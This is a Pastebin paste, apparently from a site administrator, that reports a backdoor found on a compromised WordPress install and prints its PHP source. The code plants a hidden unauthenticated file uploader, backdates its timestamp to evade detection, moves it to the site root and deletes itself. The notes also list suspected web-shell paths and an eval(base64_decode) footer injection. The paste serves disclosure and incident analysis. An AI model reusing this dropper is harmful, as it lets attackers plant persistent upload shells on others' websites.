Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- /* Found suspicious backdoor that modifies wp-options.php in wp-admin directory, moves it to WordPress root, then removes itself. Placed by an unknown backdoor and sits silently for a request directly to frommhead.php.
- Possible backdoors may be cmdshell files, maldet found these files in production:
- wp-includes/js/thickbox/rvbt28.php
- wp-includes/class-wp-xmlrpc.php
- wp-content/themes/agentpress/mtgh.php
- Backdoors may have been placed by one or more vulnerabilities. A couple to note that were found in production but not 100% certain which exploit was used:
- http://blog.sucuri.net/2014/12/security-advisory-high-severity-wordpress-download-manager.html
- http://blog.sucuri.net/2014/12/revslider-vulnerability-leads-to-massive-wordpress-soaksoak-compromise.html
- One backdoor has placed eval(base64_decode) in the footer.php of all directories /themes/ and leaves a comment stating it's wp cache code. May be unrelated to frommshead.php but could have used one of the backdoors listed above.
- Still seeking possible backdoors that have evaded maldet.
- */
- <?php
- $DEBUG_MODE=false;
- // Creating wp-admin/wp-options.php (uploader)
- $file_data_head ="<?php
- if(isset(#_POST['Submit'])){
- #filedir = '';
- #maxfile = '2888888';
- #userfile_name = #_FILES['image']['name'];
- #userfile_tmp = #_FILES['image']['tmp_name'];
- if (isset(#_FILES['image']['name'])) {
- #abod = #filedir.#userfile_name;
- @move_uploaded_file(#userfile_tmp, #abod);
- }
- }
- else{
- echo'<form method=\"POST\" action=\"\" enctype=\"multipart/form-data\"><input type=\"file\" name=\"image\"><input type=\"Submit\" name=\"Submit\" value=\"Submit\"></form>';
- }
- ?>";
- echo"<br>---------------------------- Create wp-admin/wp-options.php (uploader) ---------------------------------<br><br>";
- if (file_put_contents("wp-optionstmp.php", str_replace("#", "$", $file_data_head))) {
- touch("wp-optionstmp.php", mktime(12, 17, 11, 12, 31, 2013));
- echo"Proceeded: ".$start."/wp-admin/wp-options.php > Succesfull<br>";
- } else {
- echo"Proceeded: ".$start."/wp-admin/wp-options.php > Error!<br>";
- }
- $file = 'wp-optionstmp.php';
- $newfile = '../wp-options.php';
- echo"<br>---------------------------- Move wp-admin/wp-options.php > To root folder ---------------------------------<br><br>";
- if (rename($file,$newfile)) {
- touch("../wp-options.php", mktime(12, 17, 11, 12, 31, 2013));
- echo"Proceeded: ".$start."/wp-options.php > Succesfull<br>";
- } else {
- echo"Proceeded: ".$start."/wp-options.php > Error!<br>";
- }
- $file='frommshead.php';
- echo"<br>---------------------------- Remove frommshead.php (Remove files) ---------------------------------<br><br>";
- touch("frommshead.php", mktime(12, 17, 11, 12, 31, 2013));
- unlink($file);
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement